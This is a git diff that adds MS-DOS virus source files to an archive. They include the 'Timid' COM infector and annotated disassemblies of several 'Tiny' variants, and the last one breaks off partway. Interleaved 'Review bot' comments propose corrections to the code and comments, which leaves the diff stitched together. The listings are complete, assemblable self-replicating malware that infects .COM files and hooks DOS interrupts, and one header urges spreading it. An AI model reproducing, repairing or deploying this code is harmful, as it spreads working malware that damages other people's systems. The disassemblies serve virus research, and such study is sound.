+; NOW HAVE A 48 BIT WORD THAT IS DIFFERENCE
+; ONLY PASS BACK 32 BITS AT PRESENT
+; AS DX:AX
+
+ MOV AX,CX ;LOW 16 BITS
+ MOV DX,BX ;MID 16 BITS
+
+
+ POPF
+ POP ES
+ RET
+_elaptime ENDP
+
+
+ END
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.timid.asm b/MSDOS/Virus.MSDOS.Unknown.timid.asm
new file mode 100644
index 00000000..5490dcc1
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.timid.asm
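Review bot: In `_elaptime` the counter latch (`MOV AL,0` / `OUT TIMER_MODE,AL`) is issued before `PUSHF` / `CLI`, so a timer tick (INT 8) can land between latching counter 0 and reading `ES:TIMER_LOW` / `ES:TIMER_HI`; the 48-bit value AX:BX:DX is then assembled from a pre-rollover count and a post-rollover tick count, which shows up as a one-tick (65536-count) error in the returned difference. Moving those two latch lines to directly after `CLI` closes the window at no cost. Separately, this file is a plain high-resolution timer for Microsoft C (MEDIUM model, `_time_int` / `_elaptime` exported, no self-replication or payload), so the `Virus.MSDOS.Unknown.timer.asm` name the commit gives it is misleading for the archive and deserves a header note or a different prefix. Minor: `ASSUME ES:BIOS` is never reverted after `POP ES`; harmless here because the procedure ends, but an `ASSUME ES:NOTHING` before `RET` keeps the assembler's view honest.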
@@ -0,0 +1,195 @@ +;TIMID VIRUS asm by Mark Ludwig in 1991. +; +;-infects .coms only in current directory unless called by dos path statement +;-announces each file infected. +;297bytes=eff. length +;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses" +;Slightly modified for A86 assembly. +;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus +;-fixed bug in code reprinted in his book. +;all infected files will have VI at byte position 4-5. +;Mark Ludwig claims copyright on this virus and said he will +; sue anyone distributing his viruses around. I say have fun!. + + +main segment byte + assume cs:main, ds:main, ss:nothing + + org 100h + +host: + jmp near ptr virus_start + db 'VI' ;identifies virus + mov ah, 4ch + mov al, 0 + int 21h + +virus: + +comfile db '*.com',0 + +virus_start: + call get_start + +get_start: + sub word ptr [vir_start], offset get_start - offset virus + mov dx, offset dta + mov ah, 1ah + int 21h + call find_file + jnz exit_virus + call infect + mov dx, offset fname + mov [handle] b,24h + mov ah, 9 + int 21h +exit_virus: ;bug was here in book + mov dx, 80h + mov ah, 1ah + int 21h + mov bx, [vir_start] + mov ax, word ptr [bx+(offset start_code)-(offset virus)] + mov word ptr [host], ax + mov ax, word ptr [bx+(offset start_code)-(offset virus)+2] + mov word ptr [host+2],ax + mov al, byte ptr [bx+(offset start_code)-(offset virus)+4] + mov byte ptr [host+4], al + mov [vir_start], 100h + ret +start_code: + nop + nop + nop + nop + nop + +find_file: + mov dx, [vir_start] + add dx, offset comfile-offset virus + mov cx, 3fh + mov ah, 4eh + int 21h + +ff_loop: + or al,al + jnz ff_done + call file_ok + jz ff_done + mov ah, 4fh + int 21h + jmp ff_loop + +ff_done: + ret + +file_ok: + mov dx, offset fname + mov ax, 3d02h + int 21h + jc fok_nzend + mov bx, ax + push bx + mov cx, 5 + mov dx, offset start_image + mov ah, 3fh + int 21h + pop bx + mov ah, 3eh + int 21h + mov ax, word ptr [fsize] + add ax, offset endvirus - 
offset virus + jc fok_nzend + cmp byte ptr [start_image], 0e9h + jnz fok_zend + +fok_nzend: + mov al, 1 + or al,al + ret + +fok_zend: + xor al,al + ret + +infect: + mov dx, offset fname + mov ax, 3d02h + int 21h + mov word ptr [handle],ax + + xor cx,cx + mov dx,cx + mov bx, word ptr [handle] + mov ax, 4202h + int 21h + + mov cx, offset final -offset virus + mov dx, [vir_start] + mov bx, word ptr [handle] + mov ah, 40h + int 21h + + xor cx,cx + mov dx, word ptr [fsize] + add dx, offset start_code-offset virus + mov bx, word ptr [handle] + mov ax, 4200h + int 21h + + mov cx, 5 + mov bx, word ptr [handle] + mov dx, offset start_image + mov ah, 40h + int 21h + + xor cx,cx + mov dx,cx + mov bx, word ptr [handle] + mov ax, 4200h + int 21h + + mov bx, [vir_start] + mov byte ptr [start_image], 0e9h + mov ax, word ptr [fsize] + add ax, offset virus_start-offset virus-3 + mov word ptr [start_image+1], ax + mov word ptr [start_image+3], 4956h + + mov cx, 5 + mov dx, offset start_image + mov bx, word ptr [handle] + mov ah, 40h + int 21h + + mov bx, word ptr [handle] + mov ah, 3eh + int 21h + ret + +final: + +;data area +endvirus equ $ + 212 +org 0ff2ah + +dta db 1ah dup (?) +fsize dw 0,0 +fname db 13 dup (?) +handle dw 0 +start_image db 0,0,0,0,0 +vstack dw 50h dup (?) +vir_start dw (?) + +main ends +end host +;end of timid.asm + + + + + + + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.timid1.asm b/MSDOS/Virus.MSDOS.Unknown.timid1.asm new file mode 100644 index 00000000..894072e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timid1.asm 
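Review bot: The header says `-fixed bug in code reprinted in his book` and `exit_virus:` carries `;bug was here in book`, but neither records what the published listing had or what was changed, so this archive copy cannot be reconciled with the book or with `timid1.asm`, the MASM transcription added in the same commit. A comment at `exit_virus:` of the form `;book listing had: <original line(s) here> — replaced by the lines below` would settle the provenance. The run of empty `+` lines at the end of the hunk is whitespace noise in the committed file and can be dropped.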
@@ -0,0 +1,210 @@ +;This program is a basic virus that infects just COM files. It gets the first +;five bytes of its host and stores them elsewhere in the program and puts a +;jump to it at the start, along with the letters "VI", which are used to +;by the virus to identify an already infected program. + + +MAIN SEGMENT BYTE + ASSUME CS:MAIN,DS:MAIN,SS:NOTHING + + ORG 100H + +;This is a shell of a program which will release the virus into the system. +;All it does is jump to the virus routine, which does its job and returns to +;it, at which point it terminates to DOS. + +HOST: + jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly + db 'VI' + mov ah,4CH + mov al,0 + int 21H ;terminate normally with DOS + +VIRUS: ;this is a label for the first byte of the virus + +COMFILE DB '*.COM',0 ;search string for a com file + +VIRUS_START: + call GET_START ;get start address - this is a trick to determine the location of the start of this program +GET_START: ;put the address of GET_START on the stack with the call, + sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS + mov dx,OFFSET DTA ;put DTA at the end of the virus for now + mov ah,1AH ;set new DTA function + int 21H + call FIND_FILE ;get a com file to attack + jnz EXIT_VIRUS ;returned nz - no file to infect, exit + call INFECT ;have a good COM file to use - infect it + mov dx,OFFSET FNAME ;display the name of the file just infected + mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it + mov ah,9 + int 21H ;display it +EXIT_VIRUS: + mov dx,80H ;fix the DTA so that the host program doesn't + mov ah,1AH ;get confused and write over its data with + int 21H ;file i/o or something like that! 
+ mov bx,[VIR_START] ;get the start address of the virus + mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes + mov WORD PTR [HOST],ax ;of the COM file to their + mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file + mov WORD PTR [HOST+2],ax + mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file + mov BYTE PTR [HOST+4],al + mov [VIR_START],100H ;set up stack to do return to host program + ret ;and return to host + +START_CODE: ;move first 5 bytes from host program to here + nop ;nop's for the original assembly code + nop ;will work fine + nop + nop + nop + +;-------------------------------------------------------------------------- +;Find a file which passes FILE_OK +; +;This routine does a simple directory search to find a COM file in the +;current directory, to find a file for which FILE_OK returns with C reset. +; +FIND_FILE: + mov dx,[VIR_START] +; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it + mov cx,3FH ;search for any file, no matter what the attributes + mov ah,4EH ;do DOS search first function + int 21H +FF_LOOP: + or al,al ;is DOS return OK? + jnz FF_DONE ;no - quit with Z reset + call FILE_OK ;return ok - is this a good file to use? + jz FF_DONE ;yes - valid file found - exit with z set + mov ah,4FH ;not a valid file, so + int 21H ;do find next function + jmp FF_LOOP ;and go test next file for validity +FF_DONE: + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the COM file specified in FNAME is useable. +;if so return z, else return nz. +;What makes a COM file useable?: +; a) There must be space for the virus without exceeding the +; 64 KByte file size limit. 
+; b) Bytes 0, 3 and 4 of the file are not a near jump op code, +; and 'V', 'I', respectively +; +FILE_OK: + mov dx,OFFSET FNAME ;first open the file + mov ax,3D02H ;r/w access open file, since we'll want to write to it + int 21H + jc FOK_NZEND ;error opening file - quit and say this file can't be used + + mov bx,ax ;put file handle in bx + push bx ;and save it on the stack + mov cx,5 ;next read 5 bytes at the start of the program + mov dx,OFFSET START_IMAGE ;and store them here + mov ah,3FH ;DOS read function + int 21H + + pop bx ;restore the file handle + mov ah,3EH + int 21H ;and close the file + + mov ax,WORD PTR [FSIZE] ;get the file size of the host + add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it + jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K + cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code? + jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set + cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4? + jnz FOK_ZEND ;no, file can be infected, return with Z set +FOK_NZEND: + mov al,1 ;we'd better not infect this file + or al,al ;so return with z reset + ret +FOK_ZEND: + xor al,al ;ok to infect, return with z set + ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the COM file +;Basically, it just copies everything here to there, and then goes and +;adjusts the 5 bytes at the start of the program and the five bytes stored +;in memory. 
+; +INFECT: + mov dx,OFFSET FNAME ;first open the file + mov ax,3D02H ;r/w access open file, since we'll want to write to it + int 21H + mov WORD PTR [HANDLE],ax ;and save the file handle here + + xor cx,cx ;prepare to write virus on new file; positon file pointer + mov dx,cx ;cx:dx pointer = 0 + mov bx,WORD PTR [HANDLE] + mov ax,4202H ;locate pointer to end DOS function + int 21H + + mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write + mov dx,[VIR_START] ;ds:dx = place in memory to write from + mov bx,WORD PTR [HANDLE] ;bx = file handle + mov ah,40H ;DOS write function + int 21H + + xor cx,cx ;now we have to go save the 5 bytes which came from the start of the + mov dx,WORD PTR [FSIZE] ;so position the file pointer + add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus + mov bx,WORD PTR [HANDLE] + mov ax,4200H ;and use DOS to position the file pointer + int 21H + + mov cx,5 ;now go write START_CODE in the file + mov bx,WORD PTR [HANDLE] ;get file handle + mov dx,OFFSET START_IMAGE ;during the FILE_OK function above + mov ah,40H + int 21H + + xor cx,cx ;now go back to the start of host program + mov dx,cx ;so we can put the jump to the virus in + mov bx,WORD PTR [HANDLE] + mov ax,4200H ;locate file pointer function + int 21H + + mov bx,[VIR_START] ;calculate jump location for start of code + mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9 + mov ax,WORD PTR [FSIZE] ;and then the relative address + add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area + mov WORD PTR [START_IMAGE+1],ax + mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in + + mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE + mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE + mov bx,WORD PTR [HANDLE] ;file handle + mov ah,40H ;DOS write function + int 21H + + mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack + mov ah,3EH ;and close file + int 21H + + ret ;all 
done, the virus is transferred + +FINAL: ;label for last byte of code to be kept in virus when it moves + +ENDVIRUS EQU $ + 212 ;label for determining space needed by virus + ;Note: 212 = FFFF - FF2A - 1 = size of data space + ; $ gives approximate size of code required for virus + + ORG 0FF2AH + +DTA DB 1AH dup (?) ;this is a work area for the search function +FSIZE DW 0,0 ;file size storage area +FNAME DB 13 dup (?) ;area for file path +HANDLE DW 0 ;file handle +START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file +VSTACK DW 50H dup (?) ;stack for the virus program +VIR_START DW (?) ;start address of VIRUS (overlays the stack) + + +MAIN ENDS + + + END HOST + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-133.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-133.asm new file mode 100644 index 00000000..3dd28b18 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-133.asm 
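Review bot: Two comments disagree with the code they annotate: `START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file` describes a 5-byte buffer that FILE_OK fills with `mov cx,5` and INFECT writes back with `mov cx,5`, and `mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack` reloads the handle from the HANDLE word, not from the stack (the stack only holds the handle inside FILE_OK). Suggested wording: `;5-byte scratch area: host's original first bytes, later the E9 jump + 'VI'` and `;reload the saved file handle`.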
@@ -0,0 +1,81 @@
+VSize = 085h
+
+Code Segment
+ Assume CS:Code
+ Org 600h
+
+Bytes db 0CDh,20h,90h,90h
+
+Start: mov si, 0100h
+ mov bx, offset Int21
+ mov cx, 0050h
+ mov di, si
+ add si, [si+2]
+ push di
+ movsw
+ movsw
+ mov es, cx
+ cmpsb
+ je StartFile
+ dec si
+ dec di
+ rep movsw
+ mov es, cx
+ xchg ax, bx
+ xchg ax, cx
+Loop0: xchg ax, cx
+ xchg ax, word ptr es:[di-120h]
+ stosw
+ jcxz Loop0
+ xchg ax, bx
+StartFile:
+ push ds
+ pop es
+ ret
+
+Int21: cmp ax, 4B00h
+ jne End21
+Exec: push ax bx dx ds es
+ mov ax, 3D02h
+ call DoInt21
+ jc EndExec
+ cbw ; Zero AH
+ cwd ; Zero DX
+ mov bx, si ; Move handle to BX
+ mov ds, ax ; Set DS and ES to 60h,
+ mov es, ax ; the virus data segment
+ mov ah, 3Fh ; Read first 4 bytes
+ int 69h
+ mov al, 4Dh
+ scasb ; Check for 4D5Ah or infected file mark
+ je Close ; .EXE or already infected
+ mov al, 2
+ call LSeek ; Seek to the end, SI now contains file size
+ mov cl, VSize ; Virus size in CX, prepare to write
+ int 69h ; AH is 40h, i.e. Write operation
+ mov ax, 0E94Dh ; Virus header in AX
+ stosw ; Store it
+ xchg ax, si ; Move file size in AX
+ stosw ; Complete JMP instruction
+ xchg ax, dx ; Zero AX
+ call LSeek ; Seek to the beginning
+ int 69h ; AH is 40h, write the virus header
+Close: mov ah,3Eh ; Close the file
+ int 69h
+EndExec: pop es ds dx bx ax
+End21: jmp dword ptr cs:[69h * 4]
+
+LSeek: mov ah, 42h ; Seek operation
+ cwd ; Zero DX
+DoInt21: xor cx, cx ; External entry for Open, zero cx
+ int 69h
+ mov cl, 4 ; 4 bytes will be read/written
+ xchg ax, si ; Store AX in SI
+ mov ax, 4060h ; Prepare AH for Write
+ xor di, di ; Zero DI
+ ret
+
+VLen = $ - offset Bytes
+
+Code EndS
+ End
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-134.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-134.asm
new file mode 100644
index 00000000..af0220f6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-134.asm
@@ -0,0 +1,162 @@ + page ,132 + name TINY134 + title The 'Tiny' virus, version TINY-134 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-134 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + +; The original first 4 bytes of the infected file: + +first4 db 0CDh, 20, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. 
+; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + call do_int21 + jc end_exec ; Exit on error + + cbw ; Zero AH + cwd ; Zero DX + mov bx,si ; Save handle in BX + mov ds,ax ; Set DS and ES to 60h, + mov es,ax ; the virus data segment + + mov ah,3F ; Read the first 4 bytes + int 69 + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. 
+ + mov al,'M' ; Look for `M' + repne scasb + jz end_exec ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek ; SI now contains the file size + + mov cl,v_len ; Length of virus body + int 69 ; Append the virus to the file (AH is now 40h) + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + inc si ; Add 1 to file size for the JMP + xchg ax,si ; Move it in AX + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + xchg ax,dx ; Zero AX + call lseek ; Seek to the beginning + int 69 ; AH is 40h, write the JMP instruction + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek: + mov ah,42 ; Seek operation + cwd ; Zero DX +do_int21: + xor cx,cx ; External entry for Open + int 69 + mov cl,4 ; 4 bytes will be read/written + xchg ax,si ; Store AX in SI + mov ax,4060 ; Prepare AH for Write + xor di,di ; Zero DI + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-138.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-138.asm new file mode 100644 index 00000000..1fe30f24 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-138.asm 
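Review bot: The comments describing the interrupt hook do not match the vector the code uses: `mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler` names INT 13h although int_21 is the INT 21h replacement, and the block comment `Move the INT 21h handler to INT 32h` names vector 32h while the copy loop `xchg ax,es:[di-(69-21)*4]`, every `int 69` call and the `jmp dword ptr cs:[69*4]` exit all use vector 69h (`.radix 16` is in force). An analyst building a detection rule or a memory-scan from this listing would look at the wrong vector. Suggested wording: `; Point BX at the replacement INT 21h handler` and `; Move the original INT 21h handler to INT 69h and install int_21 as the new INT 21h handler`. The same two comments appear unchanged in the tiny-138 hunk (L163) and the tiny-143 hunk (L166); the tiny-154 and tiny-156 listings do use INT 32h, so their comments are consistent.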
@@ -0,0 +1,168 @@ + page ,132 + name TINY138 + title The 'Tiny' virus, version TINY-138 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-138 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. 
+; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + call do_int21 + jc end_exec ; Exit on error + + cbw ; Zero AH + cwd ; Zero DX + mov bx,si ; Save handle in BX + mov ds,ax ; Set DS and ES to 60h, + mov es,ax ; the virus data segment + + mov ah,3F ; Read the first 4 bytes + int 69 + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. 
+ + mov al,'M' ; Look for `M' + repne scasb + jz close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek ; SI now contains the file size + + mov cl,v_len ; Length of virus body + int 69 ; Append the virus to the file (AH is now 40h) + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + inc si ; Add 1 to file size for the JMP + xchg ax,si ; Move it in AX + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + xchg ax,dx ; Zero AX + call lseek ; Seek to the beginning + int 69 ; AH is 40h, write the JMP instruction + +close: + mov ah,3E ; Close the file + int 69 + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek: + mov ah,42 ; Seek operation + cwd ; Zero DX +do_int21: + xor cx,cx ; External entry for Open + int 69 + mov cl,4 ; 4 bytes will be read/written + xchg ax,si ; Store AX in SI + mov ax,4060 ; Prepare AH for Write + xor di,di ; Zero DI + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-143.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-143.asm new file mode 100644 index 00000000..fb15155e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-143.asm 
@@ -0,0 +1,174 @@ + page ,132 + name TINY143 + title The 'Tiny' virus, version TINY-143 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-143 +; Disassembled by Vesselin Bontchev, August 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. 
+; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + int 69 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + call lseek1 ; Lseek to file beginning (and set CL to 4) + + mov al,seg_60 shr 4 ; Read the first 4 bytes of the file + mov ds,ax ; Set buffer offset to 0060:0000h + mov es,ax ; Point ES there too + mov ah,3F + int 69 ; Do read + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. 
+ + xor di,di + mov al,'M' ; Look for `M' + repne scasb + jz close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file (and put 4 in CL) + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append the virus to the file + int 69 ; Do it + + call lseek1 ; Seek to the file beginning + + xchg ax,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 ; Overwrite the first 4 bytes of the file + int 69 ; Do it + +close: + mov ah,3E ; Close the file + int 69 + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek1: + mov al,0 ; Lseek to the file beginning + +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 69 ; Do it + + mov cl,4 ; Put 4 in CL + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-154.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-154.asm new file mode 100644 index 00000000..facdd6a5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-154.asm 
@@ -0,0 +1,182 @@ + page ,132 + name TINY154 + title The 'Tiny' virus, version TINY-154 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-154 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. 
